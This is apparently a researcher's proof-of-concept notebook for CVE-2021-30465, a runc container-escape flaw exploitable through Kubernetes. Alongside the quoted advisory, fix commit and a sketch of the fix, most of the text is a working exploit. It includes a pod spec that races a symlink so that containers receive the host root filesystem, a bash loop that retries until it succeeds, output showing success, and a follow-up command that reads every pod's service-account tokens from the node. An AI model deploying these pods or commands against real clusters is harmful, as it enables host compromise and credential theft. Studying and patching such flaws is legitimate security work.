# CVE-2021-30465 POC [GH link](https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r) [tests](https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f#diff-f977f682b614fc29b524adc972c348f0af9f88e3a874dfc0b28e3625a4f878bb) ``` go func TestStripRoot(t *testing.T) { for _, test := range []struct { root, path, out string }{ // Works with multiple components. {"/a/b", "/a/b/c", "/c"}, {"/hello/world", "/hello/world/the/quick-brown/fox", "/the/quick-brown/fox"}, // '/' must be a no-op. {"/", "/a/b/c", "/a/b/c"}, // Must be the correct order. {"/a/b", "/a/c/b", "/a/c/b"}, // Must be at start. {"/abc/def", "/foo/abc/def/bar", "/foo/abc/def/bar"}, // Must be a lexical parent. {"/foo/bar", "/foo/barSAMECOMPONENT", "/foo/barSAMECOMPONENT"}, // Must only strip the root once. {"/foo/bar", "/foo/bar/foo/bar/baz", "/foo/bar/baz"}, // Deal with .. in a fairly sane way. {"/foo/bar", "/foo/bar/../baz", "/foo/baz"}, {"/foo/bar", "../../../../../../foo/bar/baz", "/baz"}, {"/foo/bar", "/../../../../../../foo/bar/baz", "/baz"}, {"/foo/bar/../baz", "/foo/baz/bar", "/bar"}, {"/foo/bar/../baz", "/foo/baz/../bar/../baz/./foo", "/foo"}, // All paths are made absolute before stripping. {"foo/bar", "/foo/bar/baz/bee", "/baz/bee"}, {"/foo/bar", "foo/bar/baz/beef", "/baz/beef"}, {"foo/bar", "foo/bar/baz/beets", "/baz/beets"}, } { got := stripRoot(test.root, test.path) if got != test.out { t.Errorf("stripRoot(%q, %q) -- got %q, expected %q", test.root, test.path, got, test.out) } } } ``` Text from the CVE: ``` However, it turns out with some container orchestrators (such as Kubernetes -- though it is very likely that other downstream users of runc could have similar behaviour be accessible to untrusted users), the existence of additional volume management infrastructure allows this attack to be applied to gain access to the host filesystem without requiring the attacker to have completely arbitrary control over container configuration. In the case of Kubernetes, this is exploitable by creating a symlink in a volume to the top-level (well-known) directory where volumes are sourced from (for instance, `/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir`), and then using that symlink as the target of a mount. The source of the mount is an attacker controlled directory, and thus the source directory from which subsequent mounts will occur is an attacker-controlled directory. Thus the attacker can first place a symlink to `/` in their malicious source directory with the name of a volume, and a subsequent mount in the container will bind-mount `/` into the container. Applying this attack requires the attacker to start containers with a slightly peculiar volume configuration (though not explicitly malicious-looking such as bind-mounting `/` into the container explicitly), and be able to run malicious code in a container that shares volumes with said volume configuration. It helps the attacker if the host paths used for volume management are well known, though this is not a hard requirement. 
```
Text from [commit](https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f#diff-f977f682b614fc29b524adc972c348f0af9f88e3a874dfc0b28e3625a4f878bb)
```
rootfs: add mount destination validation

Because the target of a mount is inside a container (which may be a volume that is shared with another container), there exists a race condition where the target of the mount may change to a path containing a symlink after we have sanitised the path -- resulting in us inadvertently mounting the path outside of the container.

This is not immediately useful because we are in a mount namespace with MS_SLAVE mount propagation applied to "/", so we cannot mount on top of host paths in the host namespace. However, if any subsequent mountpoints in the configuration use a subdirectory of that host path as a source, those subsequent mounts will use an attacker-controlled source path (resolved within the host rootfs) -- allowing the bind-mounting of "/" into the container.

While arguably configuration issues like this are not entirely within runc's threat model, within the context of Kubernetes (and possibly other container managers that provide semi-arbitrary container creation privileges to untrusted users) this is a legitimate issue. Since we cannot block mounting from the host into the container, we need to block the first stage of this attack (mounting onto a path outside the container).

The long-term plan to solve this would be to migrate to libpathrs, but as a stop-gap we implement libpathrs-like path verification through readlink(/proc/self/fd/$n) and then do mount operations through the procfd once it's been verified to be inside the container. The target could move after we've checked it, but if it is inside the container then we can assume that it is safe for the same reason that libpathrs operations would be safe.

A slight wrinkle is the "copyup" functionality we provide for tmpfs, which is the only case where we want to do a mount on the host filesystem. To facilitate this, I split out the copy-up functionality entirely so that the logic isn't interspersed with the regular tmpfs logic. In addition, all dependencies on m.Destination being overwritten have been removed since that pattern was just begging to be a source of more mount-target bugs (we do still have to modify m.Destination for tmpfs-copyup but we only do it temporarily).

Fixes: CVE-2021-30465
Reported-by: Etienne Champetier <champetier.etienne@gmail.com>
Co-authored-by: Noah Meyerhans <nmeyerha@amazon.com>
Reviewed-by: Samuel Karp <skarp@amazon.com>
Reviewed-by: Kir Kolyshkin <kolyshkin@gmail.com> (@kolyshkin)
Reviewed-by: Akihiro Suda <akihiro.suda.cz@hco.ntt.co.jp>
Signed-off-by: Aleksa Sarai <cyphar@cyphar.com>
```
Dev Setup is a kind cluster
``` yaml
$▶ kind version
kind v0.11.0 go1.16.3 darwin/amd64
$▶ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc94
commit: 2c7861bc5e1b3e756392236553ec14a78a09f8bf
spec: 1.0.2-dev
go: go1.16.4
libseccomp: 2.5.1
root@kind-control-plane:/#
```
Second dev setup
```
$ kind version
kind v0.8.1 go1.14.2 darwin/amd64
$ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc10
spec: 1.0.1-dev
```
## Theory 1

This requires two different deployments that each target the same "mount point". The first deployment mounts the volume and creates a symlink at a well-known place in the node's filesystem. The second deployment mounts the volume, follows that symlink, and it's off to exploit town.
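For reference, the heart of the fix described in the commit message above is "open the target, verify it through readlink(/proc/self/fd/$n), then mount through that procfd". A minimal Go sketch of the idea, assuming a made-up helper `safeBindMount`; this is the shape of the approach, not runc's actual code.

``` go
// Sketch of the "verify through /proc/self/fd" idea from the fix commit above.
// Names and error handling are illustrative only -- not runc's actual API.
package main

import (
	"fmt"
	"os"
	"strings"

	"golang.org/x/sys/unix"
)

// safeBindMount bind-mounts src onto dest, but performs the mount through a
// procfd that has been re-verified to still resolve inside rootfs.
func safeBindMount(rootfs, src, dest string) error {
	fd, err := unix.Open(dest, unix.O_PATH|unix.O_CLOEXEC, 0)
	if err != nil {
		return err
	}
	defer unix.Close(fd)

	procfd := fmt.Sprintf("/proc/self/fd/%d", fd)
	realpath, err := os.Readlink(procfd)
	if err != nil {
		return err
	}
	// If the path we actually opened escaped the container rootfs, a component
	// was swapped for a symlink between config time and now: refuse to mount.
	if realpath != rootfs && !strings.HasPrefix(realpath, rootfs+"/") {
		return fmt.Errorf("possibly malicious path detected: %s is outside %s", realpath, rootfs)
	}
	// Mount through the procfd: even if dest is renamed or replaced right now,
	// the fd still points at the verified directory inode.
	return unix.Mount(src, procfd, "", unix.MS_BIND, "")
}

func main() {
	// Illustrative invocation; paths are made up and actually mounting needs root.
	if err := safeBindMount("/path/to/rootfs", "/path/to/volume", "/path/to/rootfs/honk"); err != nil {
		fmt.Println(err)
	}
}
```

Because the mount goes through the fd's magic link, swapping the destination for a symlink after the check can no longer redirect the mount outside the container rootfs.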
## Theory 2

This is a single pod spec with multiple volumes, much like the [subpath exploit](https://github.com/bgeesaman/subpath-exploit/blob/master/exploit-pod.yaml), but with different symlink targets: one that satisfies the "inside the container" check but has something else going for it that lets the second mount follow it back out.

## Hacks

Learn the underlying host path for a volume that is shared.
```
grep empty /proc/1/task/1/mountinfo
1427 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/escape-volume/host /rootfs rw,relatime - ext4 /dev/vda1 rw
1428 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/kubernetes.io~empty-dir/status-volume /status rw,relatime - ext4 /dev/vda1 rw
```
## Symlink race

[symlink_race](https://github.com/R-Niagra/Container_CVEs/tree/6f87abdc5031ac481f89904f6bb37f278c4d0ed2/cve-2018-15664)

Pushed a symlink example container here: mauilion/symlinks:push

## From Etienne
```
My exploit uses:
1) multiple containers
2) empty dir volumes / tmpfs (but some other types are likely usable)
3) mount into mounts, ie
   volumeMounts:
   - name: test1
     mountPath: /test1
   - name: test2
     mountPath: /test1/mnt2

If you can forbid mount into mounts you prevent this attack
Don't hesitate to ping me in public issue if needed
```
# more hacks.

## initial attempt
``` yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  containers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "cd /mnt1 && ln -s / mnt2 "]
    volumeMounts:
    - mountPath: /mnt1
      name: test1
  - image: nginx:stable
    name: exploit
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /test1/mnt2
      name: test2
    - mountPath: /test1
      name: test1
  volumes:
  - name: test1
    emptyDir: {}
  - name: test2
    emptyDir: {}
```
``` yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  initContainers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "mkdir -p $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape-volume//) && cd /rootfs && ln -s / $(grep rootfs /proc/1/task/1/mountinfo | awk \'{print $4}\' | sed s/escape/status/)"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
  containers:
  - image: nginx:stable
    name: exploitj
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs/status
      name: escape-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}
```
Trick to grab logs for a failed pod on the host: this grabs the recently exited prehonk container and pulls its logs.
```bash
root@kind-control-plane:/> crictl logs $(crictl ps -a | grep prehonk | awk '{print $1}')
+ cd /mnt1
+ ln -s / mnt2
ln: failed to create symbolic link 'mnt2/': File exists
```
Working exploit code:
``` yaml
# honk-pod.yaml
---
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  #securityContext:
    #runAsUser: 1000
    #runAsGroup: 1000
  containers:
  - image: nginx:latest
    imagePullPolicy: IfNotPresent
    name: 0-link0
    command: ["/bin/bash"]
    args: ["-xc", "cd /honk; while true; do rm -rf host; ln -s / host; done;"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 1-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 2-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 3-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: host-volume
    emptyDir: {}
```
```bash
$ honk.sh
#!/usr/bin/env bash
RUNS=1
while [ $RUNS -lt 100 ]; do
  kubectl delete -f honk-pod.yaml --grace-period=0 --force 2> /dev/null
  sleep 3
  kubectl apply -f honk-pod.yaml
  kubectl wait -f honk-pod.yaml --for condition=Ready --timeout=30s 2> /dev/null
  COUNTER=1
  while [ $COUNTER -lt 4 ]; do
    echo -n "Checking $COUNTER-honk for the host mount..."
    # count the pid directories on the host if there are more than 5
    # we have a success.
    if [[ "$(kubectl exec -it honk -c $COUNTER-honk -- find /proc -maxdepth 1 ! -name '*[!0-9]*' 2>/dev/null | wc -l)" -gt 5 ]]; then
    # GKE
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- /home/kubernetes/bin/crictl ps 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Kind
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- runc list 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Civo/k3s
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- k3s -v 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
      echo "SUCCESS after $RUNS runs!"
      echo "Run kubectl exec -it honk -c $COUNTER-honk -- bash"
      exit 0
    else
      echo "nope."
    fi
    let COUNTER=$COUNTER+1
  done
  let RUNS=$RUNS+1
done
```
```terminal
$ ./honk.sh
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
...snip...
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...SUCCESS after 22 runs!
Run kubectl exec -it honk -c 3-honk -- bash
```
By seeing `/run/runc` in the exploit container, we know we have a hostpath mount working because that path only exists on the underlying node and not inside our nginx container. This *may* vary per target, but it's easy enough to adjust if needed.
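For reference, honk.sh's default success check just counts the numeric (PID) entries under /proc: a vanilla nginx container sees only a handful of its own processes, while a container that ended up with the host root rbind-mounted in also sees the host's much busier /proc. A rough Go equivalent of that heuristic (the threshold of 5 is copied straight from the script and is an assumption, not a hard rule):

``` go
// Rough Go version of honk.sh's success heuristic: count PID directories
// under /proc and guess whether we are looking at the host's procfs.
package main

import (
	"fmt"
	"os"
	"strconv"
)

func main() {
	entries, err := os.ReadDir("/proc")
	if err != nil {
		fmt.Println("error reading /proc:", err)
		os.Exit(1)
	}
	pids := 0
	for _, e := range entries {
		// Numeric directory names are PIDs.
		if _, err := strconv.Atoi(e.Name()); err == nil {
			pids++
		}
	}
	if pids > 5 {
		fmt.Printf("SUCCESS: %d pid dirs visible, this looks like the host's /proc\n", pids)
	} else {
		fmt.Printf("nope (%d pid dirs)\n", pids)
	}
}
```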
```bash $ kubectl exec -it exploit -c 3-honk -- bash root@honk:/# ls bin boot dev etc home kind lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var root@honk:/# ``` ```bash $ kubectl exec -it exploit -c 3-honk -- crictl ps CONTAINER IMAGE CREATED STATE NAME ATTEMPT POD ID f354220ae48d3 f0b8a9a541369 8 minutes ago Running 3-honk 2 d6cfcd0c10c43 847a2f406e30f f0b8a9a541369 8 minutes ago Running 2-honk 0 d6cfcd0c10c43 7d6994acef655 f0b8a9a541369 8 minutes ago Running 1-honk 0 d6cfcd0c10c43 36ac6b9ef00d0 f0b8a9a541369 8 minutes ago Running 0-link 0 d6cfcd0c10c43 c672feb53eaa9 e422121c9c5f9 18 hours ago Running local-path-provisioner 0 aedc00f117150 8a3fea897c809 bfe3a36ebd252 18 hours ago Running coredns 0 cbda6967dd1f7 afe11ac87a75e bfe3a36ebd252 18 hours ago Running coredns 0 6f26d4dcd0e2e 79d5da0a84ef1 6b17089e24fdb 18 hours ago Running kindnet-cni 0 8539b3556a14b e9b44cb76c812 23b52beab6e55 18 hours ago Running kube-proxy 0 815a6a9064842 c80612e8c9e52 0369cf4303ffd 18 hours ago Running etcd 0 0563e084fe6ee 09ef10a38b9e8 51dc9758caa7b 18 hours ago Running kube-controller-manager 0 c566b807c748b d0f8fb646cd32 3ad0575b6f104 18 hours ago Running kube-apiserver 0 327abdbfe5320 396e975f0500a cd40419687469 18 hours ago Running kube-scheduler 0 950216aec91d8 ``` ```bash root@honk:/# amicontained Container Runtime: docker Has Namespaces: pid: true user: false AppArmor Profile: unconfined Capabilities: BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap Seccomp: disabled Blocked Syscalls (20): MSGRCV SYSLOG SETSID VHANGUP PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE BPF Looking for Docker.sock ``` ```bash # find -L /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -print -exec cat {} \; | sed -e 's/\/var/\r\n\/var/g'; /var/lib/kubelet/pods/05415399-22a8-4203-935f-fb7ff6662d01/volumes/kubernetes.io~secret/kindnet-token-49xqw/token eyJhbGciO... /var/lib/kubelet/pods/339bd96c-a6c9-434e-8cbf-41450eeeebd8/volumes/kubernetes.io~secret/kube-proxy-token-krck6/token eyJhbGciO... /var/lib/kubelet/pods/64ca5b3b-c68b-4ca9-b85e-c0304ba691c8/volumes/kubernetes.io~secret/coredns-token-vh96r/token eyJhbGciO... /var/lib/kubelet/pods/74a4d033-f7f3-4f86-88e6-88bd9266de17/volumes/kubernetes.io~secret/local-path-provisioner-service-account-token-5gvlp/token eyJhbGciO... /var/lib/kubelet/pods/7691bf45-3159-4f40-b054-f52144871e5b/volumes/kubernetes.io~secret/coredns-token-vh96r/token eyJhbGciO... /var/lib/kubelet/pods/b50b2a73-9265-4090-9b27-1d5d2cf00942/volumes/kubernetes.io~secret/default-token-bxhkj/token eyJhbGciO... 
``` Inspect an exploited container from the host ```json # crictl inspect e1e8927a546a6 { "status": { "id": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220", "metadata": { "attempt": 0, "name": "2-exploit" }, "state": "CONTAINER_RUNNING", "createdAt": "2021-05-21T00:52:20.8831732Z", "startedAt": "2021-05-21T00:52:21.0110818Z", "finishedAt": "1970-01-01T00:00:00Z", "exitCode": 0, "image": { "annotations": {}, "image": "docker.io/library/nginx:latest" }, "imageRef": "docker.io/library/nginx@sha256:df13abe416e37eb3db4722840dd479b00ba193ac6606e7902331dcea50f4f1f2", "reason": "", "message": "", "labels": { "io.kubernetes.container.name": "2-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "b5a5fa", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "mounts": [ { "containerPath": "/rootfs", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/rootfs/host", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/var/run/secrets/kubernetes.io/serviceaccount", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "propagation": "PROPAGATION_PRIVATE", "readonly": true, "selinuxRelabel": false }, { "containerPath": "/etc/hosts", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false }, { "containerPath": "/dev/termination-log", "hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a", "propagation": "PROPAGATION_PRIVATE", "readonly": false, "selinuxRelabel": false } ], "logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/2-exploit/0.log" }, "info": { "sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8", "pid": 2894296, "removing": false, "snapshotKey": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220", "snapshotter": "overlayfs", "runtimeType": "io.containerd.runc.v2", "runtimeOptions": null, "config": { "metadata": { "name": "2-exploit" }, "image": { "image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6" }, "command": [ "sleep", "infinity" ], "envs": [ { "key": "KUBERNETES_PORT_443_TCP_ADDR", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_HOST", "value": "10.96.0.1" }, { "key": "KUBERNETES_SERVICE_PORT", "value": "443" }, { "key": "KUBERNETES_SERVICE_PORT_HTTPS", "value": "443" }, { "key": "KUBERNETES_PORT", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP", "value": "tcp://10.96.0.1:443" }, { "key": "KUBERNETES_PORT_443_TCP_PROTO", "value": "tcp" }, { "key": "KUBERNETES_PORT_443_TCP_PORT", "value": "443" } ], "mounts": [ { "container_path": "/rootfs", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume" }, { 
"container_path": "/rootfs/host", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume" }, { "container_path": "/var/run/secrets/kubernetes.io/serviceaccount", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "readonly": true }, { "container_path": "/etc/hosts", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts" }, { "container_path": "/dev/termination-log", "host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a" } ], "labels": { "io.kubernetes.container.name": "2-exploit", "io.kubernetes.pod.name": "exploit", "io.kubernetes.pod.namespace": "default", "io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3" }, "annotations": { "io.kubernetes.container.hash": "b5a5fa", "io.kubernetes.container.restartCount": "0", "io.kubernetes.container.terminationMessagePath": "/dev/termination-log", "io.kubernetes.container.terminationMessagePolicy": "File", "io.kubernetes.pod.terminationGracePeriod": "30" }, "log_path": "2-exploit/0.log", "linux": { "resources": { "cpu_period": 100000, "cpu_shares": 2, "oom_score_adj": 1000, "hugepage_limits": [ { "page_size": "1GB" }, { "page_size": "2MB" } ] }, "security_context": { "namespace_options": { "pid": 1 }, "run_as_user": {}, "masked_paths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonly_paths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } }, "runtimeSpec": { "ociVersion": "1.0.2-dev", "process": { "user": { "uid": 0, "gid": 0 }, "args": [ "sleep", "infinity" ], "env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=exploit", "NGINX_VERSION=1.19.10", "NJS_VERSION=0.5.3", "PKG_RELEASE=1~buster", "KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1", "KUBERNETES_SERVICE_HOST=10.96.0.1", "KUBERNETES_SERVICE_PORT=443", "KUBERNETES_SERVICE_PORT_HTTPS=443", "KUBERNETES_PORT=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443", "KUBERNETES_PORT_443_TCP_PROTO=tcp", "KUBERNETES_PORT_443_TCP_PORT=443" ], "cwd": "/", "capabilities": { "bounding": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "effective": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "inheritable": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ], "permitted": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ] }, "oomScoreAdj": 1000 }, "root": { "path": "rootfs" }, "mounts": [ { "destination": "/proc", "type": "proc", "source": "proc", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": [ "nosuid", "strictatime", 
"mode=755", "size=65536k" ] }, { "destination": "/dev/pts", "type": "devpts", "source": "devpts", "options": [ "nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5" ] }, { "destination": "/dev/mqueue", "type": "mqueue", "source": "mqueue", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/sys", "type": "sysfs", "source": "sysfs", "options": [ "nosuid", "noexec", "nodev", "ro" ] }, { "destination": "/sys/fs/cgroup", "type": "cgroup", "source": "cgroup", "options": [ "nosuid", "noexec", "nodev", "relatime", "ro" ] }, { "destination": "/rootfs", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/escape-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/rootfs/host", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~empty-dir/host-volume", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hosts", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/termination-log", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/hostname", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/etc/resolv.conf", "type": "bind", "source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/dev/shm", "type": "bind", "source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm", "options": [ "rbind", "rprivate", "rw" ] }, { "destination": "/var/run/secrets/kubernetes.io/serviceaccount", "type": "bind", "source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/kubernetes.io~secret/default-token-bxhkj", "options": [ "rbind", "rprivate", "ro" ] } ], "annotations": { "io.kubernetes.cri.container-name": "2-exploit", "io.kubernetes.cri.container-type": "container", "io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8" }, "linux": { "resources": { "devices": [ { "allow": false, "access": "rwm" } ], "memory": {}, "cpu": { "shares": 2, "period": 100000 } }, "cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220", "namespaces": [ { "type": "pid" }, { "type": "ipc", "path": "/proc/2893298/ns/ipc" }, { "type": "uts", "path": "/proc/2893298/ns/uts" }, { "type": "mount" }, { "type": "network", "path": "/proc/2893298/ns/net" } ], "maskedPaths": [ "/proc/acpi", "/proc/kcore", "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", "/proc/scsi", "/sys/firmware" ], "readonlyPaths": [ "/proc/asound", "/proc/bus", "/proc/fs", "/proc/irq", "/proc/sys", "/proc/sysrq-trigger" ] } } } } ``` Inspect a non-exploited container ```json # crictl inspect addfd289b2769 { "status": { "id": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060", "metadata": { "attempt": 0, "name": "1-exploit" }, "state": 
